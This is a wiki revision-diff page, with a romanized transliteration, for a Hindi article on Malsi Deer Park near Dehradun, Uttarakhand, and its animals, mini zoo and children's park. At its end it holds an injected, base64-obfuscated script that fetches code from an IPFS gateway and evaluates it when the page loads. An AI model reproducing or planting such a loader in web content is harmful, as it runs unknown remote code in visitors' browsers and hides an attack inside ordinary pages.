Difference between revisions of "मलसी डियर पार्क देहरादून"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*देवभूमि [[उत्तराखंड]] की राजधानी व उत्तरी [[भारत]] के पश्चिमोत्तर [[उत्तरांचल]] राज्य में स्थित [[देहरादून]] से 10 किमी. आगे [[मसूरी]] जाने वाले रास्ते पर मलसी डियर पार्क पर्यटक स्थल है।
+
*देवभूमि [[उत्तराखंड]] की राजधानी व उत्तरी [[भारत]] के पश्चिमोत्तर [[उत्तरांचल]] राज्य में स्थित [[देहरादून]] में मलसी डियर पार्क प्रमुख [[देहरादून पर्यटन|पर्यटन स्थल]] में से है।
 +
*देहरादून से 10 किमी. आगे [[मसूरी]] जाने वाले रास्ते पर मलसी डियर पार्क पर्यटक स्थल है।
 
*[[शिवालिक पहाड़ी|शिवालिक की पहाड़ियों]] की तराई में बनी मलसी डियर पार्क जगह अभी हाल में ही विकसित की गई है।  
 
*[[शिवालिक पहाड़ी|शिवालिक की पहाड़ियों]] की तराई में बनी मलसी डियर पार्क जगह अभी हाल में ही विकसित की गई है।  
 
*मलसी डियर पार्क ख़ूबसूरत वातावरण के बीच हिरन, नील गाय और पक्षियों को देखना पर्यटकों को एक सुखद अहसास का अनुभव कराता है।  
 
*मलसी डियर पार्क ख़ूबसूरत वातावरण के बीच हिरन, नील गाय और पक्षियों को देखना पर्यटकों को एक सुखद अहसास का अनुभव कराता है।  

Revision as of 09:31, 25 June 2010

  • devabhoomi uttarakhand ki rajadhani v uttari bharat ke pashchimottar uttaraanchal rajy mean sthit deharadoon mean malasi diyar park pramukh paryatan sthal mean se hai.
  • deharadoon se 10 kimi. age masoori jane vale raste par malasi diyar park paryatak sthal hai.
  • shivalik ki paha diyoan ki taraee mean bani malasi diyar park jagah abhi hal mean hi vikasit ki gee hai.
  • malasi diyar park khoobasoorat vatavaran ke bich hiran, nil gay aur pakshiyoan ko dekhana paryatakoan ko ek sukhad ahasas ka anubhav karata hai.
  • masoori jane vale paryatak malasi diyar park ruk kar tho di der aram kar sakate haian.
  • malasi diyar park mean ek chhota sa chi diyaghar aur bachchoan ke lie park hai, jo sabhi ayu varg ke logoan ko apani or akarshit karata hai.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>